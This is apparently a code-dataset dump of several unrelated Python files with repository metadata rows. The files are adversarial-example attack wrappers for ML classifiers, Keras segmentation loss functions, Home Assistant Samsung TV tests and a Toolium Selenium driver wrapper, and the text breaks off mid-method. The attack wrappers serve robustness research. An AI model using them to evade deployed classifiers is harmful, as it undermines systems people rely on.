= attack_args.get('targeted', False) attacker = BasicIterativeMethod(classifier=model, eps=eps, eps_step=eps_step, max_iter=max_iter, targeted=targeted) return attacker.generate(data, labels) def _jsma(model, data, labels, attack_args): theta = attack_args.get('theta', 0.15) gamma = attack_args.get('gamma', 0.5) batch_size = attack_args.get('batch_size', 1) attacker = SaliencyMapMethod(classifier=model, theta=theta, gamma=gamma, batch_size=batch_size) return attacker.generate(data, labels) def _df(model, data, labels, attack_args): max_iter = attack_args.get('max_iter', 100) eps = attack_args.get('eps', 0.01) nb_grads = attack_args.get('nb_grads', 10) attacker = DeepFool(classifier=model, max_iter=max_iter, epsilon=eps, nb_grads=nb_grads) return attacker.generate(data, labels) def _mim(model, data, labels, attack_args): raise NotImplementedError def _op(model, data, labels, attack_args): raise NotImplementedError def _spatial(model, data, labels, attack_args): max_translation = attack_args.get('max_translation', 0.2) num_translations = attack_args.get('num_translations', 1) max_rotation = attack_args.get('max_rotation', 10) num_rotations = attack_args.get('num_rotations', 1) attacker = SpatialTransformation(classifier=model, max_translation=max_translation, num_translations=num_translations, max_rotation=max_rotation, num_rotations=num_rotations) return attacker.generate(data, labels) def _hop_skip_jump(model, data, labels, attack_args): norm = _get_norm_value(attack_args.get('norm', 'l2')) max_iter = attack_args.get('max_iter', 50) max_eval = attack_args.get('max_eval', 10000) init_eval = attack_args.get('init_eval', 100) init_size = attack_args.get('init_size', 100) targeted = attack_args.get('targeted', False) attacker = HopSkipJump(classifier=model, targeted=targeted, norm=norm, max_iter=max_iter, max_eval=max_eval, init_eval=init_eval, init_size=init_size) return attacker.generate(data, labels) def _zoo(model, data, labels, attack_args): lr = attack_args.get('learning_rate', 0.01) max_iter = attack_args.get('max_iter', 10) binary_search_steps = attack_args.get('binary_search_steps', 1) confidence = attack_args.get('confidence', 0.0) targeted = attack_args.get('targeted', False) init_const = attack_args.get('init_const', 1e-3) abort_early = attack_args.get('abort_early', True) use_resize = attack_args.get('use_resize', True) use_importance = attack_args.get('use_importance', True) nb_parallel = attack_args.get('nb_parallel', 128) variable_h = attack_args.get('variable_h', 1e-4) attacker = ZooAttack(classifier=model, confidence=confidence, targeted=targeted, learning_rate=lr, max_iter=max_iter, binary_search_steps=binary_search_steps, initial_const=init_const, abort_early=abort_early, use_resize=use_resize, use_importance=use_importance, nb_parallel=nb_parallel, variable_h=variable_h) return attacker.generate(data, labels) def _get_norm_value(norm): norm = norm.lower() if norm == 'linf': value = np.inf elif norm == 'l2': value = 2 else: raise ValueError('Support `l2` and `linf` norms. But found {}.'.format(norm)) return value
true
true
f728fcac6ccca36a457c58b9703f275e34dc84ed
2,607
py
Python
polus-cell-nuclei-segmentation/src/dsb2018_topcoders/selim/losses.py
nishaq503/polus-plugins-dl
511689e82eb29a84761538144277d1be1af7aa44
[ "MIT" ]
null
null
null
polus-cell-nuclei-segmentation/src/dsb2018_topcoders/selim/losses.py
nishaq503/polus-plugins-dl
511689e82eb29a84761538144277d1be1af7aa44
[ "MIT" ]
1
2021-09-09T23:22:16.000Z
2021-09-09T23:22:16.000Z
polus-cell-nuclei-segmentation/src/dsb2018_topcoders/selim/losses.py
nishaq503/polus-plugins-dl
511689e82eb29a84761538144277d1be1af7aa44
[ "MIT" ]
4
2021-06-22T13:54:52.000Z
2022-01-26T19:23:39.000Z
import keras.backend as K from keras.losses import categorical_crossentropy def hard_dice_coef(y_true, y_pred, smooth=1e-3): y_true_f = K.flatten(K.round(y_true[..., 0])) y_pred_f = K.flatten(K.round(y_pred[..., 0])) intersection = K.sum(y_true_f * y_pred_f) return 100. * (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth) def hard_dice_coef_ch1(y_true, y_pred, smooth=1e-3): y_true_f = K.flatten(K.round(y_true[..., 1])) y_pred_f = K.flatten(K.round(y_pred[..., 1])) intersection = K.sum(y_true_f * y_pred_f) return 100. * (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth) def dice_coef(y_true, y_pred, smooth=1e-3): y_true_f = K.flatten(y_true) y_pred_f = K.flatten(y_pred) intersection = K.sum(y_true_f * y_pred_f) return K.mean((2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)) def dice_coef_loss(y_true, y_pred): return 1 - dice_coef(y_true, y_pred) def dice_coef_loss_bce(y_true, y_pred, dice=0.5, bce=0.5): return binary_crossentropy(y_true, y_pred) * bce + dice_coef_loss(y_true, y_pred) * dice def binary_crossentropy(y, p): return K.mean(K.binary_crossentropy(y, p)) def double_head_loss(y_true, y_pred): mask_loss = dice_coef_loss_bce(y_true[..., 0], y_pred[..., 0]) contour_loss = dice_coef_loss_bce(y_true[..., 1], y_pred[..., 1]) return mask_loss + contour_loss def mask_contour_mask_loss(y_true, y_pred): mask_loss = dice_coef_loss_bce(y_true[..., 0], y_pred[..., 0]) contour_loss = dice_coef_loss_bce(y_true[..., 1], y_pred[..., 1]) full_mask = dice_coef_loss_bce(y_true[..., 2], y_pred[..., 2]) return mask_loss + 2 * contour_loss + full_mask def softmax_dice_loss(y_true, y_pred): return categorical_crossentropy(y_true, y_pred) * 0.6 + dice_coef_loss(y_true[..., 0], y_pred[..., 0]) * 0.2 + dice_coef_loss(y_true[..., 1], y_pred[..., 1]) * 0.2 def make_loss(loss_name): if loss_name == 'bce_dice': def loss(y, p): return dice_coef_loss_bce(y, p, dice=0.5, bce=0.5) return loss elif loss_name == 'bce': def loss(y, p): return dice_coef_loss_bce(y, p, dice=0, bce=1) return loss elif loss_name == 'categorical_dice': return softmax_dice_loss elif loss_name == 'double_head_loss': return double_head_loss elif loss_name == 'mask_contour_mask_loss': return mask_contour_mask_loss else: ValueError("Unknown loss.")
35.22973
168
0.642501
import keras.backend as K from keras.losses import categorical_crossentropy def hard_dice_coef(y_true, y_pred, smooth=1e-3): y_true_f = K.flatten(K.round(y_true[..., 0])) y_pred_f = K.flatten(K.round(y_pred[..., 0])) intersection = K.sum(y_true_f * y_pred_f) return 100. * (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth) def hard_dice_coef_ch1(y_true, y_pred, smooth=1e-3): y_true_f = K.flatten(K.round(y_true[..., 1])) y_pred_f = K.flatten(K.round(y_pred[..., 1])) intersection = K.sum(y_true_f * y_pred_f) return 100. * (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth) def dice_coef(y_true, y_pred, smooth=1e-3): y_true_f = K.flatten(y_true) y_pred_f = K.flatten(y_pred) intersection = K.sum(y_true_f * y_pred_f) return K.mean((2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)) def dice_coef_loss(y_true, y_pred): return 1 - dice_coef(y_true, y_pred) def dice_coef_loss_bce(y_true, y_pred, dice=0.5, bce=0.5): return binary_crossentropy(y_true, y_pred) * bce + dice_coef_loss(y_true, y_pred) * dice def binary_crossentropy(y, p): return K.mean(K.binary_crossentropy(y, p)) def double_head_loss(y_true, y_pred): mask_loss = dice_coef_loss_bce(y_true[..., 0], y_pred[..., 0]) contour_loss = dice_coef_loss_bce(y_true[..., 1], y_pred[..., 1]) return mask_loss + contour_loss def mask_contour_mask_loss(y_true, y_pred): mask_loss = dice_coef_loss_bce(y_true[..., 0], y_pred[..., 0]) contour_loss = dice_coef_loss_bce(y_true[..., 1], y_pred[..., 1]) full_mask = dice_coef_loss_bce(y_true[..., 2], y_pred[..., 2]) return mask_loss + 2 * contour_loss + full_mask def softmax_dice_loss(y_true, y_pred): return categorical_crossentropy(y_true, y_pred) * 0.6 + dice_coef_loss(y_true[..., 0], y_pred[..., 0]) * 0.2 + dice_coef_loss(y_true[..., 1], y_pred[..., 1]) * 0.2 def make_loss(loss_name): if loss_name == 'bce_dice': def loss(y, p): return dice_coef_loss_bce(y, p, dice=0.5, bce=0.5) return loss elif loss_name == 'bce': def loss(y, p): return dice_coef_loss_bce(y, p, dice=0, bce=1) return loss elif loss_name == 'categorical_dice': return softmax_dice_loss elif loss_name == 'double_head_loss': return double_head_loss elif loss_name == 'mask_contour_mask_loss': return mask_contour_mask_loss else: ValueError("Unknown loss.")
true
true
f728fd4af10f998ca802829dd4c857af4852e38b
3,108
py
Python
tests/components/samsungtv/test_init.py
mikan-megane/core
837220cce40890e296920d33a623adbc11bd15a6
[ "Apache-2.0" ]
5
2018-10-23T14:15:05.000Z
2021-11-26T06:38:44.000Z
tests/components/samsungtv/test_init.py
mikan-megane/core
837220cce40890e296920d33a623adbc11bd15a6
[ "Apache-2.0" ]
79
2020-07-23T07:13:37.000Z
2022-03-22T06:02:37.000Z
tests/components/samsungtv/test_init.py
mikan-megane/core
837220cce40890e296920d33a623adbc11bd15a6
[ "Apache-2.0" ]
2
2019-06-11T12:13:14.000Z
2020-12-24T23:17:53.000Z
"""Tests for the Samsung TV Integration.""" from unittest.mock import Mock, call, patch from homeassistant.components.media_player.const import DOMAIN, SUPPORT_TURN_ON from homeassistant.components.samsungtv.const import ( CONF_ON_ACTION, DOMAIN as SAMSUNGTV_DOMAIN, METHOD_WEBSOCKET, ) from homeassistant.components.samsungtv.media_player import SUPPORT_SAMSUNGTV from homeassistant.const import ( ATTR_ENTITY_ID, ATTR_SUPPORTED_FEATURES, CONF_HOST, CONF_METHOD, CONF_NAME, SERVICE_VOLUME_UP, ) from homeassistant.core import HomeAssistant from homeassistant.setup import async_setup_component ENTITY_ID = f"{DOMAIN}.fake_name" MOCK_CONFIG = { SAMSUNGTV_DOMAIN: [ { CONF_HOST: "fake_host", CONF_NAME: "fake_name", CONF_ON_ACTION: [{"delay": "00:00:01"}], CONF_METHOD: METHOD_WEBSOCKET, } ] } REMOTE_CALL = { "name": "HomeAssistant", "description": "HomeAssistant", "id": "ha.component.samsung", "host": MOCK_CONFIG[SAMSUNGTV_DOMAIN][0][CONF_HOST], "method": "legacy", "port": None, "timeout": 1, } async def test_setup(hass: HomeAssistant, remote: Mock): """Test Samsung TV integration is setup.""" with patch("homeassistant.components.samsungtv.bridge.Remote") as remote, patch( "homeassistant.components.samsungtv.config_flow.socket.gethostbyname", return_value="fake_host", ): with patch("homeassistant.components.samsungtv.bridge.Remote") as remote: await async_setup_component(hass, SAMSUNGTV_DOMAIN, MOCK_CONFIG) await hass.async_block_till_done() state = hass.states.get(ENTITY_ID) # test name and turn_on assert state assert state.name == "fake_name" assert ( state.attributes[ATTR_SUPPORTED_FEATURES] == SUPPORT_SAMSUNGTV | SUPPORT_TURN_ON ) # test host and port assert await hass.services.async_call( DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True ) assert remote.call_args == call(REMOTE_CALL) async def test_setup_duplicate_config(hass: HomeAssistant, remote: Mock, caplog): """Test duplicate setup of platform.""" DUPLICATE = { SAMSUNGTV_DOMAIN: [ MOCK_CONFIG[SAMSUNGTV_DOMAIN][0], MOCK_CONFIG[SAMSUNGTV_DOMAIN][0], ] } await async_setup_component(hass, SAMSUNGTV_DOMAIN, DUPLICATE) await hass.async_block_till_done() assert hass.states.get(ENTITY_ID) is None assert len(hass.states.async_all()) == 0 assert "duplicate host entries found" in caplog.text async def test_setup_duplicate_entries(hass: HomeAssistant, remote: Mock, caplog): """Test duplicate setup of platform.""" await async_setup_component(hass, SAMSUNGTV_DOMAIN, MOCK_CONFIG) await hass.async_block_till_done() assert hass.states.get(ENTITY_ID) assert len(hass.states.async_all()) == 1 await async_setup_component(hass, SAMSUNGTV_DOMAIN, MOCK_CONFIG) assert len(hass.states.async_all()) == 1
33.419355
84
0.69112
from unittest.mock import Mock, call, patch from homeassistant.components.media_player.const import DOMAIN, SUPPORT_TURN_ON from homeassistant.components.samsungtv.const import ( CONF_ON_ACTION, DOMAIN as SAMSUNGTV_DOMAIN, METHOD_WEBSOCKET, ) from homeassistant.components.samsungtv.media_player import SUPPORT_SAMSUNGTV from homeassistant.const import ( ATTR_ENTITY_ID, ATTR_SUPPORTED_FEATURES, CONF_HOST, CONF_METHOD, CONF_NAME, SERVICE_VOLUME_UP, ) from homeassistant.core import HomeAssistant from homeassistant.setup import async_setup_component ENTITY_ID = f"{DOMAIN}.fake_name" MOCK_CONFIG = { SAMSUNGTV_DOMAIN: [ { CONF_HOST: "fake_host", CONF_NAME: "fake_name", CONF_ON_ACTION: [{"delay": "00:00:01"}], CONF_METHOD: METHOD_WEBSOCKET, } ] } REMOTE_CALL = { "name": "HomeAssistant", "description": "HomeAssistant", "id": "ha.component.samsung", "host": MOCK_CONFIG[SAMSUNGTV_DOMAIN][0][CONF_HOST], "method": "legacy", "port": None, "timeout": 1, } async def test_setup(hass: HomeAssistant, remote: Mock): with patch("homeassistant.components.samsungtv.bridge.Remote") as remote, patch( "homeassistant.components.samsungtv.config_flow.socket.gethostbyname", return_value="fake_host", ): with patch("homeassistant.components.samsungtv.bridge.Remote") as remote: await async_setup_component(hass, SAMSUNGTV_DOMAIN, MOCK_CONFIG) await hass.async_block_till_done() state = hass.states.get(ENTITY_ID) assert state assert state.name == "fake_name" assert ( state.attributes[ATTR_SUPPORTED_FEATURES] == SUPPORT_SAMSUNGTV | SUPPORT_TURN_ON ) assert await hass.services.async_call( DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True ) assert remote.call_args == call(REMOTE_CALL) async def test_setup_duplicate_config(hass: HomeAssistant, remote: Mock, caplog): DUPLICATE = { SAMSUNGTV_DOMAIN: [ MOCK_CONFIG[SAMSUNGTV_DOMAIN][0], MOCK_CONFIG[SAMSUNGTV_DOMAIN][0], ] } await async_setup_component(hass, SAMSUNGTV_DOMAIN, DUPLICATE) await hass.async_block_till_done() assert hass.states.get(ENTITY_ID) is None assert len(hass.states.async_all()) == 0 assert "duplicate host entries found" in caplog.text async def test_setup_duplicate_entries(hass: HomeAssistant, remote: Mock, caplog): await async_setup_component(hass, SAMSUNGTV_DOMAIN, MOCK_CONFIG) await hass.async_block_till_done() assert hass.states.get(ENTITY_ID) assert len(hass.states.async_all()) == 1 await async_setup_component(hass, SAMSUNGTV_DOMAIN, MOCK_CONFIG) assert len(hass.states.async_all()) == 1
true
true
f728fdc393576c7d300b95276d9f3b1aeee7cd65
16,567
py
Python
toolium/driver_wrapper.py
Telefonica/toolium
3921cf94164ae1a2cd27d94197f0b145f2498541
[ "Apache-2.0" ]
94
2016-02-15T11:32:36.000Z
2022-02-14T12:31:42.000Z
toolium/driver_wrapper.py
Telefonica/toolium
3921cf94164ae1a2cd27d94197f0b145f2498541
[ "Apache-2.0" ]
225
2016-03-18T16:14:21.000Z
2022-03-30T10:21:26.000Z
toolium/driver_wrapper.py
Telefonica/toolium
3921cf94164ae1a2cd27d94197f0b145f2498541
[ "Apache-2.0" ]
65
2016-05-12T13:23:56.000Z
2022-02-16T08:33:18.000Z
# -*- coding: utf-8 -*- u""" Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U. This file is part of Toolium. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import logging.config import os import screeninfo from toolium.config_driver import ConfigDriver from toolium.config_parser import ExtendedConfigParser from toolium.driver_wrappers_pool import DriverWrappersPool from toolium.utils.driver_utils import Utils from toolium.utils.path_utils import get_valid_filename class DriverWrapper(object): """Wrapper with the webdriver and the configuration needed to execute tests :type driver: selenium.webdriver.remote.webdriver.WebDriver or appium.webdriver.webdriver.WebDriver :type config: toolium.config_parser.ExtendedConfigParser or configparser.ConfigParser :type utils: toolium.utils.driver_utils.Utils :type app_strings: dict :type session_id: str :type remote_node: str :type remote_node_video_enabled: bool :type logger: logging.Logger :type config_properties_filenames: str :type config_log_filename: str :type output_log_filename: str :type visual_baseline_directory: str :type baseline_name: str """ driver = None #: webdriver instance config = ExtendedConfigParser() #: driver configuration utils = None #: test utils instance app_strings = None #: mobile application strings session_id = None #: remote webdriver session id server_type = None #: remote server type remote_node = None #: remote grid node remote_node_video_enabled = False #: True if the remote grid node has the video recorder enabled logger = None #: logger instance # Configuration and output files config_properties_filenames = None #: configuration filenames separated by commas config_log_filename = None #: configuration log file output_log_filename = None #: output log file visual_baseline_directory = None #: folder with the baseline images baseline_name = None #: baseline name def __init__(self): if not DriverWrappersPool.is_empty(): # Copy config object and other properties from default driver default_wrapper = DriverWrappersPool.get_default_wrapper() self.config = default_wrapper.config.deepcopy() self.logger = default_wrapper.logger self.config_properties_filenames = default_wrapper.config_properties_filenames self.config_log_filename = default_wrapper.config_log_filename self.output_log_filename = default_wrapper.output_log_filename self.visual_baseline_directory = default_wrapper.visual_baseline_directory self.baseline_name = default_wrapper.baseline_name # Create utils instance and add wrapper to the pool self.utils = Utils(self) DriverWrappersPool.add_wrapper(self) def configure_logger(self, tc_config_log_filename=None, tc_output_log_filename=None): """Configure selenium instance logger :param tc_config_log_filename: test case specific logging config file :param tc_output_log_filename: test case specific output logger file """ # Get config logger filename config_log_filename = DriverWrappersPool.get_configured_value('Config_log_filename', tc_config_log_filename, 'logging.conf') config_log_filename = os.path.join(DriverWrappersPool.config_directory, config_log_filename) # Configure logger only if logging filename has changed if self.config_log_filename != config_log_filename: # Get output logger filename output_log_filename = DriverWrappersPool.get_configured_value('Output_log_filename', tc_output_log_filename, 'toolium.log') output_log_filename = os.path.join(DriverWrappersPool.output_directory, output_log_filename) output_log_filename = output_log_filename.replace('\\', '\\\\') try: logging.config.fileConfig(config_log_filename, {'logfilename': output_log_filename}, False) except Exception as exc: print("[WARN] Error reading logging config file '{}': {}".format(config_log_filename, exc)) self.config_log_filename = config_log_filename self.output_log_filename = output_log_filename self.logger = logging.getLogger(__name__) def configure_properties(self, tc_config_prop_filenames=None, behave_properties=None): """Configure selenium instance properties :param tc_config_prop_filenames: test case specific properties filenames :param behave_properties: dict with behave user data properties """ prop_filenames = DriverWrappersPool.get_configured_value('Config_prop_filenames', tc_config_prop_filenames, 'properties.cfg;local-properties.cfg') prop_filenames = [os.path.join(DriverWrappersPool.config_directory, filename) for filename in prop_filenames.split(';')] prop_filenames = ';'.join(prop_filenames) # Configure config only if properties filename has changed if self.config_properties_filenames != prop_filenames: # Initialize the config object self.config = ExtendedConfigParser.get_config_from_file(prop_filenames) self.config_properties_filenames = prop_filenames # Override properties with system properties self.config.update_properties(os.environ) # Override properties with behave userdata properties if behave_properties: self.config.update_properties(behave_properties) # Modify config properties before driver creation self.finalize_properties_configuration() def finalize_properties_configuration(self): # Override method if config properties (self.config object) need custom modifications before driver creation pass def configure_visual_baseline(self): """Configure baseline directory""" # Get baseline name and translate config variables baseline_name = self.config.get_optional('VisualTests', 'baseline_name', '{Driver_type}') baseline_name = self.config.translate_config_variables(baseline_name) # Configure baseline directory if baseline name has changed if self.baseline_name != baseline_name: self.baseline_name = baseline_name self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, get_valid_filename(baseline_name)) def update_visual_baseline(self): """Configure baseline directory after driver is created""" # Update baseline with real platformVersion value if '{PlatformVersion}' in self.baseline_name: try: platform_version = self.driver.desired_capabilities['platformVersion'] except KeyError: platform_version = None self.baseline_name = self.baseline_name.replace('{PlatformVersion}', str(platform_version)) self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, self.baseline_name) # Update baseline with real version value if '{Version}' in self.baseline_name: try: splitted_version = self.driver.desired_capabilities['version'].split('.') version = '.'.join(splitted_version[:2]) except KeyError: version = None self.baseline_name = self.baseline_name.replace('{Version}', str(version)) self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, self.baseline_name) # Update baseline with remote node value if '{RemoteNode}' in self.baseline_name: self.baseline_name = self.baseline_name.replace('{RemoteNode}', str(self.remote_node)) self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, self.baseline_name) def configure(self, tc_config_files, is_selenium_test=True, behave_properties=None): """Configure initial selenium instance using logging and properties files for Selenium or Appium tests :param tc_config_files: test case specific config files :param is_selenium_test: true if test is a selenium or appium test case :param behave_properties: dict with behave user data properties """ # Configure config and output directories DriverWrappersPool.configure_common_directories(tc_config_files) # Configure logger self.configure_logger(tc_config_files.config_log_filename, tc_config_files.output_log_filename) # Initialize the config object self.configure_properties(tc_config_files.config_properties_filenames, behave_properties) # Configure visual directories if is_selenium_test: driver_info = self.config.get('Driver', 'type') DriverWrappersPool.configure_visual_directories(driver_info) self.configure_visual_baseline() def connect(self, maximize=True): """Set up the selenium driver and connect to the server :param maximize: True if the driver should be maximized :returns: selenium driver """ if not self.config.get('Driver', 'type') or self.config.get('Driver', 'type') in ['api', 'no_driver']: return None self.driver = ConfigDriver(self.config, self.utils).create_driver() # Save session id and remote node to download video after the test execution self.session_id = self.driver.session_id self.server_type, self.remote_node = self.utils.get_remote_node() if self.server_type == 'grid': self.remote_node_video_enabled = self.utils.is_remote_video_enabled(self.remote_node) else: self.remote_node_video_enabled = True if self.server_type in ['ggr', 'selenoid'] else False # Save app_strings in mobile tests if self.is_mobile_test() and not self.is_web_test() and self.config.getboolean_optional('Driver', 'appium_app_strings'): self.app_strings = self.driver.app_strings() if self.is_maximizable(): # Bounds and screen bounds_x, bounds_y = self.get_config_window_bounds() self.driver.set_window_position(bounds_x, bounds_y) self.logger.debug('Window bounds: %s x %s', bounds_x, bounds_y) # Maximize browser if maximize: # Set window size or maximize window_width = self.config.get_optional('Driver', 'window_width') window_height = self.config.get_optional('Driver', 'window_height') if window_width and window_height: self.driver.set_window_size(window_width, window_height) else: self.driver.maximize_window() # Log window size window_size = self.utils.get_window_size() self.logger.debug('Window size: %s x %s', window_size['width'], window_size['height']) # Update baseline self.update_visual_baseline() # Discard previous logcat logs self.utils.discard_logcat_logs() # Set implicitly wait timeout self.utils.set_implicitly_wait() return self.driver def get_config_window_bounds(self): """Reads bounds from config and, if monitor is specified, modify the values to match with the specified monitor :return: coords X and Y where set the browser window. """ bounds_x = int(self.config.get_optional('Driver', 'bounds_x') or 0) bounds_y = int(self.config.get_optional('Driver', 'bounds_y') or 0) monitor_index = int(self.config.get_optional('Driver', 'monitor') or -1) if monitor_index > -1: try: monitor = screeninfo.get_monitors()[monitor_index] bounds_x += monitor.x bounds_y += monitor.y except NotImplementedError: self.logger.warning('Current environment doesn\'t support get_monitors') return bounds_x, bounds_y def is_android_test(self): """Check if actual test must be executed in an Android mobile :returns: True if test must be executed in an Android mobile """ return self.utils.get_driver_name() == 'android' def is_ios_test(self): """Check if actual test must be executed in an iOS mobile :returns: True if test must be executed in an iOS mobile """ return self.utils.get_driver_name() in ('ios', 'iphone') def is_mobile_test(self): """Check if actual test must be executed in a mobile :returns: True if test must be executed in a mobile """ return self.is_android_test() or self.is_ios_test() def is_web_test(self): """Check if actual test must be executed in a browser :returns: True if test must be executed in a browser """ appium_browser_name = self.config.get_optional('AppiumCapabilities', 'browserName') return not self.is_mobile_test() or appium_browser_name not in (None, '') def is_android_web_test(self): """Check if actual test must be executed in a browser of an Android mobile :returns: True if test must be executed in a browser of an Android mobile """ return self.is_android_test() and self.is_web_test() def is_ios_web_test(self): """Check if actual test must be executed in a browser of an iOS mobile :returns: True if test must be executed in a browser of an iOS mobile """ return self.is_ios_test() and self.is_web_test() def is_maximizable(self): """Check if the browser is maximizable :returns: True if the browser is maximizable """ return not self.is_mobile_test() def should_reuse_driver(self, scope, test_passed, context=None): """Check if the driver should be reused :param scope: execution scope (function, module, class or session) :param test_passed: True if the test has passed :param context: behave context :returns: True if the driver should be reused """ reuse_driver = self.config.getboolean_optional('Driver', 'reuse_driver') reuse_driver_session = self.config.getboolean_optional('Driver', 'reuse_driver_session') restart_driver_after_failure = (self.config.getboolean_optional('Driver', 'restart_driver_after_failure') or self.config.getboolean_optional('Driver', 'restart_driver_fail')) if context and scope == 'function': reuse_driver = reuse_driver or (hasattr(context, 'reuse_driver_from_tags') and context.reuse_driver_from_tags) return (((reuse_driver and scope == 'function') or (reuse_driver_session and scope != 'session')) and (test_passed or not restart_driver_after_failure)) def get_driver_platform(self): """ Get driver platform where tests are running :return: platform name """ platform = '' if 'platform' in self.driver.desired_capabilities: platform = self.driver.desired_capabilities['platform'] elif 'platformName' in self.driver.desired_capabilities: platform = self.driver.desired_capabilities['platformName'] return platform
46.536517
120
0.669584
import logging.config import os import screeninfo from toolium.config_driver import ConfigDriver from toolium.config_parser import ExtendedConfigParser from toolium.driver_wrappers_pool import DriverWrappersPool from toolium.utils.driver_utils import Utils from toolium.utils.path_utils import get_valid_filename class DriverWrapper(object): driver = None config = ExtendedConfigParser() utils = None app_strings = None session_id = None server_type = None remote_node = None remote_node_video_enabled = False logger = None config_properties_filenames = None config_log_filename = None output_log_filename = None visual_baseline_directory = None baseline_name = None def __init__(self): if not DriverWrappersPool.is_empty(): default_wrapper = DriverWrappersPool.get_default_wrapper() self.config = default_wrapper.config.deepcopy() self.logger = default_wrapper.logger self.config_properties_filenames = default_wrapper.config_properties_filenames self.config_log_filename = default_wrapper.config_log_filename self.output_log_filename = default_wrapper.output_log_filename self.visual_baseline_directory = default_wrapper.visual_baseline_directory self.baseline_name = default_wrapper.baseline_name self.utils = Utils(self) DriverWrappersPool.add_wrapper(self) def configure_logger(self, tc_config_log_filename=None, tc_output_log_filename=None): config_log_filename = DriverWrappersPool.get_configured_value('Config_log_filename', tc_config_log_filename, 'logging.conf') config_log_filename = os.path.join(DriverWrappersPool.config_directory, config_log_filename) if self.config_log_filename != config_log_filename: output_log_filename = DriverWrappersPool.get_configured_value('Output_log_filename', tc_output_log_filename, 'toolium.log') output_log_filename = os.path.join(DriverWrappersPool.output_directory, output_log_filename) output_log_filename = output_log_filename.replace('\\', '\\\\') try: logging.config.fileConfig(config_log_filename, {'logfilename': output_log_filename}, False) except Exception as exc: print("[WARN] Error reading logging config file '{}': {}".format(config_log_filename, exc)) self.config_log_filename = config_log_filename self.output_log_filename = output_log_filename self.logger = logging.getLogger(__name__) def configure_properties(self, tc_config_prop_filenames=None, behave_properties=None): prop_filenames = DriverWrappersPool.get_configured_value('Config_prop_filenames', tc_config_prop_filenames, 'properties.cfg;local-properties.cfg') prop_filenames = [os.path.join(DriverWrappersPool.config_directory, filename) for filename in prop_filenames.split(';')] prop_filenames = ';'.join(prop_filenames) if self.config_properties_filenames != prop_filenames: self.config = ExtendedConfigParser.get_config_from_file(prop_filenames) self.config_properties_filenames = prop_filenames self.config.update_properties(os.environ) if behave_properties: self.config.update_properties(behave_properties) self.finalize_properties_configuration() def finalize_properties_configuration(self): pass def configure_visual_baseline(self): baseline_name = self.config.get_optional('VisualTests', 'baseline_name', '{Driver_type}') baseline_name = self.config.translate_config_variables(baseline_name) if self.baseline_name != baseline_name: self.baseline_name = baseline_name self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, get_valid_filename(baseline_name)) def update_visual_baseline(self): if '{PlatformVersion}' in self.baseline_name: try: platform_version = self.driver.desired_capabilities['platformVersion'] except KeyError: platform_version = None self.baseline_name = self.baseline_name.replace('{PlatformVersion}', str(platform_version)) self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, self.baseline_name) if '{Version}' in self.baseline_name: try: splitted_version = self.driver.desired_capabilities['version'].split('.') version = '.'.join(splitted_version[:2]) except KeyError: version = None self.baseline_name = self.baseline_name.replace('{Version}', str(version)) self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, self.baseline_name) if '{RemoteNode}' in self.baseline_name: self.baseline_name = self.baseline_name.replace('{RemoteNode}', str(self.remote_node)) self.visual_baseline_directory = os.path.join(DriverWrappersPool.visual_baseline_directory, self.baseline_name) def configure(self, tc_config_files, is_selenium_test=True, behave_properties=None): DriverWrappersPool.configure_common_directories(tc_config_files) self.configure_logger(tc_config_files.config_log_filename, tc_config_files.output_log_filename) self.configure_properties(tc_config_files.config_properties_filenames, behave_properties) if is_selenium_test: driver_info = self.config.get('Driver', 'type') DriverWrappersPool.configure_visual_directories(driver_info) self.configure_visual_baseline() def connect(self, maximize=True): if not self.config.get('Driver', 'type') or self.config.get('Driver', 'type') in ['api', 'no_driver']: return None self.driver = ConfigDriver(self.config, self.utils).create_driver() self.session_id = self.driver.session_id self.server_type, self.remote_node = self.utils.get_remote_node() if self.server_type == 'grid': self.remote_node_video_enabled = self.utils.is_remote_video_enabled(self.remote_node) else: self.remote_node_video_enabled = True if self.server_type in ['ggr', 'selenoid'] else False if self.is_mobile_test() and not self.is_web_test() and self.config.getboolean_optional('Driver', 'appium_app_strings'): self.app_strings = self.driver.app_strings() if self.is_maximizable(): bounds_x, bounds_y = self.get_config_window_bounds() self.driver.set_window_position(bounds_x, bounds_y) self.logger.debug('Window bounds: %s x %s', bounds_x, bounds_y) if maximize: window_width = self.config.get_optional('Driver', 'window_width') window_height = self.config.get_optional('Driver', 'window_height') if window_width and window_height: self.driver.set_window_size(window_width, window_height) else: self.driver.maximize_window() window_size = self.utils.get_window_size() self.logger.debug('Window size: %s x %s', window_size['width'], window_size['height']) self.update_visual_baseline() self.utils.discard_logcat_logs() self.utils.set_implicitly_wait() return self.driver def get_config_window_bounds(self): bounds_x = int(self.config.get_optional('Driver', 'bounds_x') or 0) bounds_y = int(self.config.get_optional('Driver', 'bounds_y') or 0) monitor_index = int(self.config.get_optional('Driver', 'monitor') or -1) if monitor_index > -1: try: monitor = screeninfo.get_monitors()[monitor_index] bounds_x += monitor.x bounds_y += monitor.y except NotImplementedError: self.logger.warning('Current environment doesn\'t support get_monitors') return bounds_x, bounds_y def is_android_test(self): return self.utils.get_driver_name() == 'android' def is_ios_test(self): return 